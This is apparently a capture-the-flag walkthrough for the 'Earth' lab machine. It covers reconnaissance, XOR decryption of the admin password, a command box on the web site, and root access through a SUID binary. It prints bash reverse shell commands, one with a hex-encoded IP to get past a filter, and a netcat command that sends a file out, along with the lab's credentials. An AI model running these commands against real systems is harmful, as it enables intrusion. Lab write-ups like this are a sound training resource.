Earth
Information gathering
Host discovery
Detailed scan
Add a DNS entry
vim /etc/hosts
Web information gathering
Visit https://earth.local
Visit https://terratest.earth.local
Back-end pages
admin page
robots page
The robots file is not found when scanning over http, but is found over https
It hints at visiting
/testingnotes.<extension>
If there are many candidate extensions, write a script; if only a few, test them one by one
Testing eventually turns up /testingnotes.txt
It reveals that the admin user is terra, the encryption algorithm is XOR, and the test encryption file is testdata.txt (the key material)
Visit https://terratest.earth.local/testdata.txt
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
Password decryption
Test the three ciphertexts found on the home page at the start
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
Decryption result
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
The output is a repeating string
earthclimatechangebad4humans
Try logging in to the admin page with username terra and password earthclimatechangebad4humans
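The XOR decryption step above, as an added Python example that is not part of the original write-up: it XORs a hex ciphertext against a text key (repeating the key if needed) and then finds the shortest repeating unit in the result, which is how the password stands out of the repeated output. The key sentence and the ciphertext in the block are constructed for the demo, and the function names xor_decrypt_hex and smallest_repeating_unit are my own.

```python
# Added example (not from the original write-up): repeating-key XOR
# decryption plus detection of the repeating unit in the recovered text.
# KEY_TEXT and the ciphertext are constructed for this demo; on the box
# the key is the full content of testdata.txt.
from itertools import cycle

KEY_TEXT = ("According to radiometric dating estimation and other evidence, "
            "Earth formed over 4.5 billion years ago.")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against key, cycling the key when data is longer."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def xor_decrypt_hex(hex_ciphertext: str, key_text: str) -> str:
    """Decode a hex ciphertext and XOR it with key_text."""
    plain = xor_bytes(bytes.fromhex(hex_ciphertext), key_text.encode())
    return plain.decode("latin-1")  # keeps every byte visible


def smallest_repeating_unit(text: str) -> str:
    """Shortest prefix whose repetition reproduces text (a trailing
    partial repeat is allowed, as in the truncated decrypted output)."""
    for n in range(1, len(text) + 1):
        unit = text[:n]
        if (unit * (len(text) // n + 1))[:len(text)] == text:
            return unit
    return text


def build_demo_ciphertext() -> str:
    """Constructed sample: the repeated password XORed with KEY_TEXT."""
    password = "earthclimatechangebad4humans"
    plaintext = (password * 4)[:100]  # truncated like the real output
    return xor_bytes(plaintext.encode(), KEY_TEXT.encode()).hex()


if __name__ == "__main__":
    ct = build_demo_ciphertext()
    recovered = xor_decrypt_hex(ct, KEY_TEXT)
    print(recovered)
    print("repeating unit:", smallest_repeating_unit(recovered))
```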
webshell
After logging in to the admin page, a command box appears
Try some commands
Reverse shell
Start a listener on kali
Enter the reverse shell command in the command box
bash -c 'bash -i &>/dev/tcp/10.4.7.132/8888 0>1'
It does not execute
Look for the cause of the failure
ping 127.0.0.1
Shows a message that remote connections are forbidden
ping localhost
Keeps loading indefinitely
ping localhost -c 2
Limiting it to two pings and waiting a moment returns output, which shows that IP addresses are being filtered
Try converting the IP address to hexadecimal to bypass the filter
bash -c 'bash -i >& /dev/tcp/0x0A.0x04.0x07.0x84/8888 0>&1'
Connection succeeded
Privilege escalation
SUID permissions
sudo -l
Search for SUID binaries
strace debugging
strace is a tool for tracing and debugging applications. It captures and displays the system calls and signal interactions between an application and the operating system during execution. With strace you can understand an application's behaviour, including the files it opens, reads and writes, the network data it sends and receives, the processes it creates and terminates, and its other interactions with the operating system.
The basic syntax of strace is:
strace [options] [command]
Debug on the target machine
Shows that the command does not exist
Download the binary to kali for debugging
kali
nc -nlvp 1234 >reset_root
target
nc 10.4.7.132 1234 < /usr/bin/reset_root
strace shows that three files are missing
Create the three files on the target
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Run the binary again
/usr/bin/reset_root
Shows that the root password has been changed to Earth
Switch to root
Summary
- XOR decoding
- IP address conversion
- strace debugging